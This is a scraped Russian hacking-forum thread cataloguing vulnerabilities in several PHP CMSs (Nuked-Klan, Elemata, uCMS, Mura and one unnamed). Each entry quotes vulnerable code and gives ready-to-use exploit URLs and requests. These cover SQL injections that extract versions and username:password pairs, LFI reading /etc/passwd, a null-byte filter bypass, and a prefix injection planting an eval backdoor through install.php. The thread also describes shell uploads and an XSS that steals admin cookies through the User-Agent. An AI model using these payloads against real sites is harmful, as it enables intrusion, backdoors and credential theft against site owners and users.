[/COLOR][COLOR="#0000BB"]$plugin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_row[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT url,status FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pre[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"plugins WHERE name = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]strtolower[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]str_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"_"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'plugin'[/COLOR][COLOR="#007700"]])).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]));
if ([/COLOR][COLOR="#0000BB"]$plugin[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#DD0000"]"Off"[/COLOR][COLOR="#007700"]) {
echo[/COLOR][COLOR="#DD0000"]"Sorry, but the "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]ucwords[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'plugin'[/COLOR][COLOR="#007700"]]).[/COLOR][COLOR="#DD0000"]" Plugin is offline"[/COLOR][COLOR="#007700"];
} else {
[/COLOR][COLOR="#0000BB"]$module[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'module'[/COLOR][COLOR="#007700"]];
include ([/COLOR][COLOR="#0000BB"]$sitepath[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"plugins/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$plugin[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]]);
...[/COLOR][/COLOR]
Данные из запроса попадают в функцию include
Exploit:
http://127.0.0.1/cms/index.php?view=plugins&plugin=a' union select '/../../../../../etc/passwd',null --
Blind SQL injection
Зависимости: нет
File: /config.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if ([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]] &&[/COLOR][COLOR="#0000BB"]stristr[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]],[/COLOR][COLOR="#DD0000"]"admin.php"[/COLOR][COLOR="#007700"]) ===[/COLOR][COLOR="#0000BB"]FALSE[/COLOR][COLOR="#007700"]) {
if ([/COLOR][COLOR="#0000BB"]mysql_num_rows[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pre[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"stats_archive WHERE name = 'referer' AND data = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"' AND week = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"W"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"' AND year = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"])) ==[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"INSERT INTO "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pre[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"stats_archive VALUES (null, 'referer', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"W"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"n"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]date[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"Y"[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#DD0000"]"', 1, 1, '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"')"[/COLOR][COLOR="#007700"]);
} else {
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$pre[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"stats_archive SET views=views+1, date = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]().[/COLOR][COLOR="#DD0000"]"' WHERE name = 'referer' AND data = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$_SERVER[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'HTTP_REFERER'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
}
...
}
...[/COLOR][/COLOR]
Не фильтруется $_SERVER['HTTP_REFERER']. Можно крутить как слепую, если условие верно - ошибки нет.
Exploit:
Код:
Code:
GET /cms/index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; rv:2.2) Gecko/20110201
Referer: 1' and if(mid((select version()),1,1)=5,1,(select 1 union select 2)) -- d
Code execution
Зависимости: не удален файл install.php
Exploit:
Заходим на install.php и в качестве префикса таблицы указываем
Код:
Code:
aaa_'; if (isset($_REQUEST['e'])) eval(stripslashes($_REQUEST['e'])); //
Получаем бекдор:
http://127.0.0.1/cms/inc/dbinfo.php?e=phpinfo();
|
|
|
|
14.07.2012, 15:40
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Уязвимости Nuked-Klan
Nuked-Klan SP 4.5 Скачать
На баг-треках я нашел один актуальный баг. Но есть ещё.
В движке используется ereg.
Remote code execution
Зависимости: magic_qoutes_gpc = off
File: /globals.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]EXTR_SKIP[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]extract[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]EXTR_SKIP[/COLOR][COLOR="#007700"]);
...
[/COLOR][COLOR="#0000BB"]$bad_string[/COLOR][COLOR="#007700"]= array([/COLOR][COLOR="#DD0000"]"%20union%20"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"/*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*/union/*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"+union+"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"load_file"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"outfile"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"document.cookie"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"onmouse"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]" 0 "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$and[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" ORDER BY pseudo LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$start[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$nb_membres[/COLOR][COLOR="#007700"]);
...
[/COLOR][/COLOR]
Используем null-byte для обхода регулярки.
PoC:
http://127.0.0.1/nk/index.php?file=Members&letter=XX%00'+and+1=0+%0aun ion+select+version(),2,3,4,5,6,7,8,9+--+d
SQL injection
Зависимости: magic_quotes_gpc = off, надо быть зарегистрированным пользователем.
File: /modules/Userbox/index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]post_message[/COLOR][COLOR="#007700"]()
{
global[/COLOR][COLOR="#0000BB"]$for[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$titre[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$user[/COLOR][COLOR="#007700"];
if ([/COLOR][COLOR="#0000BB"]$for[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"]&&[/COLOR][COLOR="#0000BB"]ereg[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"^[a-zA-Z0-9]+$"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$for[/COLOR][COLOR="#007700"]))
{
[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT pseudo FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]USER_TABLE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE id = '"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$for[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"'"[/COLOR][COLOR="#007700"]);
list([/COLOR][COLOR="#0000BB"]$pseudo[/COLOR][COLOR="#007700"]) =[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]);
}
...
if ([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]stripslashes[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$reply[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"[quote="[/COLOR][COLOR="#007700"].[/quote][/COLOR][quote="[/COLOR][COLOR="#007700"][COLOR="#0000BB"]$pseudo[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"]"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]htmlentities[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$message[/COLOR][COLOR="#007700"]) .[/COLOR][COLOR="#DD0000"]"[/COLOR][/quote][COLOR="#DD0000"]"[/COLOR][COLOR="#007700"];
}
...
}[/COLOR][/COLOR]
PoC:
http://127.0.0.1/nk/index.php?file=Userbox&op=post_message&message=a&f or=a%00'%0aunion+select+version()+--+
Заливка шелла
Нужны права администратора
Заходим на http://127.0.0.1/nk/index.php?file=Page&page=admin
Создаем новую php-страницу, в контенте вводим eval(stripslashes($_REQUEST['x'])); или загружаем файл.
|
|
|
|
22.07.2012, 12:59
|
|
Участник форума
Регистрация: 15.07.2009
Сообщений: 158
Провел на форуме:
698831
Репутация:
34
|
|
Elemata CMS
Сайт разработчика
Скачать
SQL-injection
Зависимости: magic_quotes_qpc = off
File: /functions/global.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
function[/COLOR][COLOR="#0000BB"]e_meta[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#007700"])
{
...
[/COLOR][COLOR="#0000BB"]$query_meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM posts WHERE id = '[/COLOR][COLOR="#0000BB"]$id[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$query_meta[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$row_meta[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$meta[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]'
'[/COLOR][COLOR="#007700"];
...
}[/COLOR][/COLOR]
PoC:
http://127.0.0.1/e/index.php?id=1'+and+1=0+union+select+1,2,3,4,5,con cat(username,0x3a,password),7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26+from+users+--+
Пассивная XSS
File: /themes/revive/search.php
PHP код:
PHP:
[COLOR="#000000"]...
You searched for "[COLOR="#0000BB"][/COLOR]"
...[/COLOR]
PoC:
http://127.0.0.1/e/index.php?s=alert('lol');
Заливка шелла
Зависимости: права администратора
В админ-панеле в разделе Media.
LFI
Зависимости: magic_quotes_qpc = off, и права администратора
File: /admin/content/themes.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
if([/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cmd'[/COLOR][COLOR="#007700"]] ==[/COLOR][COLOR="#0000BB"]activate[/COLOR][COLOR="#007700"])
{
[/COLOR][COLOR="#FF8000"]//UPDATE THEME SETTINGS
[/COLOR][COLOR="#0000BB"]$a_folder[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_REQUEST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'folder'[/COLOR][COLOR="#007700"]];
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$database_default[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"UPDATE settings SET theme = '[/COLOR][COLOR="#0000BB"]$a_folder[/COLOR][COLOR="#DD0000"]'"[/COLOR][COLOR="#007700"]);
}
...[/COLOR][/COLOR]
File: /index.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#FF8000"]//Include Theme
[/COLOR][COLOR="#0000BB"]mysql_select_db[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$database_default[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$default[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM settings"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$row_theme[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_assoc[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$theme[/COLOR][COLOR="#007700"]);
include ([/COLOR][COLOR="#DD0000"]"themes/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$row_theme[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'theme'[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]"/index.php"[/COLOR][COLOR="#007700"]);
...[/COLOR][/COLOR]
PoC:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=../../../../../../../etc/passwd%00
Заходим на главную страницу и файл инклюдится. Меняем тему обратно на стандартную:
http://127.0.0.1/e/admin/index.php?action=themes&cmd=activate&folder=revive
uCMS v 1.2
Сайт разработчика
Скачать
SQL injection
Зависимости: magic_quotes_gpc = off
File: /content.php
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]...
[/COLOR][COLOR="#0000BB"]$current_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"pages WHERE id = '[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id_page[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' Limit 1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$r_current_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$current_page[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$current_version_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$db_prefix[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"pages_lg WHERE id_page = '[/COLOR][COLOR="#0000BB"]$r_current_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' AND id_lg = '[/COLOR][COLOR="#0000BB"]$r_current_language[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]][/COLOR][COLOR="#DD0000"]' Limit 1"[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_fetch_array[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$current_version_page[/COLOR][COLOR="#007700"]);
...
if([/COLOR][COLOR="#0000BB"]settings_site_name_display[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])
{
include([/COLOR][COLOR="#DD0000"]'modules/sitename/sitename.php'[/COLOR][COLOR="#007700"]);
if([/COLOR][COLOR="#0000BB"]settings_site_name_position[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$mod_sitename_site_name[/COLOR][COLOR="#007700"].([/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]' - '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
elseif([/COLOR][COLOR="#0000BB"]settings_site_name_position[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]].([/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]] ?[/COLOR][COLOR="#DD0000"]' - '[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]).[/COLOR][COLOR="#0000BB"]$mod_sitename_site_name[/COLOR][COLOR="#007700"];
}
else
[/COLOR][COLOR="#0000BB"]$page_title[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$r_current_version_page[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'title'[/COLOR][COLOR="#007700"]];
...[/COLOR][/COLOR]
Данные из первого запроса попадают во второй. Далее выводится переменная $page_title. PoC:
Код:
Code:
-1' union select 1,2,3,4,version(),6,7,8,9,10,11,12 -- d ==>
0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064
http://127.0.0.1/cms/index.php?id_page=-1'+union+select+0x2D312720756E696F6E2073656C65637420312C322C332C342C76657273696F6E28292C362C372C382C392C31302C31312C3132202D2D2064,2,3,4,5,6,7,8+--+
|
|
|
|
18.04.2013, 21:06
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
Mura CMS 6 (build 5310)
website: http://www.getmura.com/
Active XSS
суть в том что в админской панели выводятся логи посетителей, в том числе и user-agent, который не фильтруется
открываем любую страницу сайта,при этом меняем user-agent на js снифф, и при открытии логовой страницы в панели админа куки бегут к нам.
немного кода
Код:
Code:
/Mura/requirements/mura/user/sessionTracking/sessionTrackingDAO.cfc
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"]
[/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]INSERT INTO tsessiontracking[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]REMOTE_ADDR[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SCRIPT_NAME[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]QUERY_STRING[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]SERVER_NAME[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]URLToken[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]UserID[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]siteID[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#0000BB"]country[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]lang[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]locale[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]contentID[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]referer[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]keywords[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]user_agent[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]Entered[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]originalURLToken[/COLOR][COLOR="#007700"])
[/COLOR][COLOR="#0000BB"]values[/COLOR][COLOR="#007700"](
,
,
,
,
,
,
,
,
,
,
,
,
,
,
,
)
[/COLOR][/COLOR]
Код:
Code:
/Mura/requirements/dashboard/dashboardManager.cfm
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#0000BB"]select user_agent from arguments[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]rsSession where user_agent[/COLOR][COLOR="#007700"]>[/COLOR][COLOR="#DD0000"]''
[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
output
Код:
Code:
/Mura/admin/core/views/cdashboard/viewsession.cfm
PHP код:
PHP:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][COLOR="#FF8000"]#application.rbFactory.getKeyValue(session.rb,"dashboard.session.useragent")#: #application.dashboardManager.getUserAgentFromSessionQuery(rc.rslist)#
[/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
|
|
|
|
|
|
|
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Библиотека
|
SladerNon |
Болталка |
17 |
05.02.2007 23:30 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
